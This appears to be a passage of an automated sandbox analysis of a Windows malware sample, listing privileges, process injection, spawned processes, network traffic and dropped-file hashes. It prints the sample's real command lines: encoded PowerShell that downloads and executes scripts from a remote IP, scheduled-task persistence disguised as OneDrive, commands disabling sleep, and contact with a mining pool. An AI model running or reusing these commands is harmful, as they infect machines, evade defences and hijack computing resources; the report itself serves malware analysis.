Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2088 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 548 wrote to memory of 1656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 5104 wrote to memory of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1116 wrote to memory of 3968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1116 wrote to memory of 3968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 4880 wrote to memory of 3392 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4880 wrote to memory of 3392 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4880 wrote to memory of 2952 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4880 wrote to memory of 2952 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4880 wrote to memory of 1284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4880 wrote to memory of 1284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4880 wrote to memory of 3476 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4880 wrote to memory of 3476 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1116 wrote to memory of 3892 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1116 wrote to memory of 3892 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1116 wrote to memory of 3892 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1116 wrote to memory of 1252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1116 wrote to memory of 1252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1116 wrote to memory of 1252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1252 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1252 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1252 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 2644 wrote to memory of 3832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2644 wrote to memory of 3832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2644 wrote to memory of 3724 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2644 wrote to memory of 3724 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2644 wrote to memory of 2224 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2644 wrote to memory of 2224 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2644 wrote to memory of 3596 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2644 wrote to memory of 3596 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1252 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1252 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1252 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1252 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 1252 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 1252 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 640 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 640 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 640 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4944 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 4944 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe

"C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1656 -ip 1656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 1512

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 00:50 /du 23:59 /sc daily /ri 1 /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp635.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
NL 8.238.177.126:80 tcp
US 20.189.173.12:443 tcp
US 40.125.122.176:443 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 23.41.204.62.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 93.184.220.29:80 tcp
NL 8.238.177.126:80 tcp
US 40.125.122.176:443 tcp
N/A 185.161.248.16:26885 tcp
US 8.8.8.8:53 16.248.161.185.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 123.108.74.40.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp

Files

memory/2088-133-0x0000000000B40000-0x0000000000B66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ysbp1hsy.wnp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1116-142-0x000001BA61460000-0x000001BA61482000-memory.dmp

memory/1116-173-0x000001BA614B0000-0x000001BA614C0000-memory.dmp

memory/4472-172-0x000002DBF6100000-0x000002DBF6110000-memory.dmp

memory/548-176-0x0000016D98820000-0x0000016D98830000-memory.dmp

memory/5104-177-0x000002070F040000-0x000002070F050000-memory.dmp

memory/5104-175-0x000002070F040000-0x000002070F050000-memory.dmp

memory/548-178-0x0000016D98820000-0x0000016D98830000-memory.dmp

memory/4472-174-0x000002DBF6100000-0x000002DBF6110000-memory.dmp

memory/4472-179-0x000002DBF6100000-0x000002DBF6110000-memory.dmp

memory/1116-180-0x000001BA614B0000-0x000001BA614C0000-memory.dmp

memory/1656-183-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5fe0ce98e33b4a45e2a796ef1be2d16c
SHA1 1034ce2655e8cc47127e6c3f1bd7495fb5906cdd
SHA256 984ad046f9526683451b296135ef4e10679359043e8513a3d7c035b0ade4686e
SHA512 d7a4fcf2563b8be2b95b839ba41d5980936176c15f9b99cbe5bc7e1be5692cb45317c1a035bc153800f02003f588b0205ffcb671e1a7c59fca178f5a549f0783

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1656-188-0x0000000005790000-0x00000000057F6000-memory.dmp

memory/1656-189-0x00000000058A0000-0x000000000593C000-memory.dmp

memory/1656-190-0x0000000005800000-0x0000000005866000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c99bf984470b50d6d6d1bc428350c588
SHA1 977b213e51f6295dabdcb1ebe9c86fd8e6fef87b
SHA256 bb87529d81e5a91b8c6cbf2e0b8da19b7c0142fd6c0f541deadbe0551d280a31
SHA512 e2ccc419eec7002cf53f543f4e83b71556465c456662a0669594b67a979383c37dda636df84e99abb1883d2795810d49a46ac1677e23e2ac9d5336edfb3ab09d

memory/324-191-0x0000000000400000-0x0000000000430000-memory.dmp

memory/1656-195-0x0000000005E50000-0x0000000005E60000-memory.dmp

memory/1116-196-0x000001BA614B0000-0x000001BA614C0000-memory.dmp

memory/1116-197-0x000001BA614B0000-0x000001BA614C0000-memory.dmp

memory/1116-198-0x000001BA614B0000-0x000001BA614C0000-memory.dmp

memory/1656-200-0x0000000005E50000-0x0000000005E60000-memory.dmp

memory/324-203-0x000000000ABA0000-0x000000000B1B8000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/324-206-0x000000000A690000-0x000000000A79A000-memory.dmp

memory/324-207-0x0000000005140000-0x0000000005152000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/324-210-0x000000000A580000-0x000000000A5BC000-memory.dmp

memory/324-211-0x00000000051C0000-0x00000000051D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c99bf984470b50d6d6d1bc428350c588
SHA1 977b213e51f6295dabdcb1ebe9c86fd8e6fef87b
SHA256 bb87529d81e5a91b8c6cbf2e0b8da19b7c0142fd6c0f541deadbe0551d280a31
SHA512 e2ccc419eec7002cf53f543f4e83b71556465c456662a0669594b67a979383c37dda636df84e99abb1883d2795810d49a46ac1677e23e2ac9d5336edfb3ab09d

memory/4632-224-0x000001DA760B0000-0x000001DA760C0000-memory.dmp

memory/4632-225-0x000001DA760B0000-0x000001DA760C0000-memory.dmp

memory/4632-226-0x000001DA760B0000-0x000001DA760C0000-memory.dmp

memory/3968-227-0x00007FF7D26A0000-0x00007FF7D306A000-memory.dmp

memory/324-228-0x00000000051C0000-0x00000000051D0000-memory.dmp

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

memory/4632-236-0x000001DA760B0000-0x000001DA760C0000-memory.dmp

memory/4632-237-0x000001DA760B0000-0x000001DA760C0000-memory.dmp

memory/3892-238-0x0000000000400000-0x000000000058B000-memory.dmp

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1252-250-0x0000000000F10000-0x0000000001330000-memory.dmp

memory/1252-251-0x0000000000F10000-0x0000000001330000-memory.dmp

memory/1252-253-0x0000000006DB0000-0x0000000007354000-memory.dmp

memory/1252-252-0x0000000000F10000-0x0000000001330000-memory.dmp

memory/1252-254-0x00000000068A0000-0x0000000006932000-memory.dmp

memory/4632-255-0x000001DA760B0000-0x000001DA760C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/3968-259-0x00007FF7D26A0000-0x00007FF7D306A000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5ef8878725b6933615098fa18735c998
SHA1 e7f309c1a261ebe11ecdacef018399b89e9163ef
SHA256 16106040f8518b4796d560e5d5ed1a95a4ef6ec3d937cb6ae6c03a3c4d31d7db
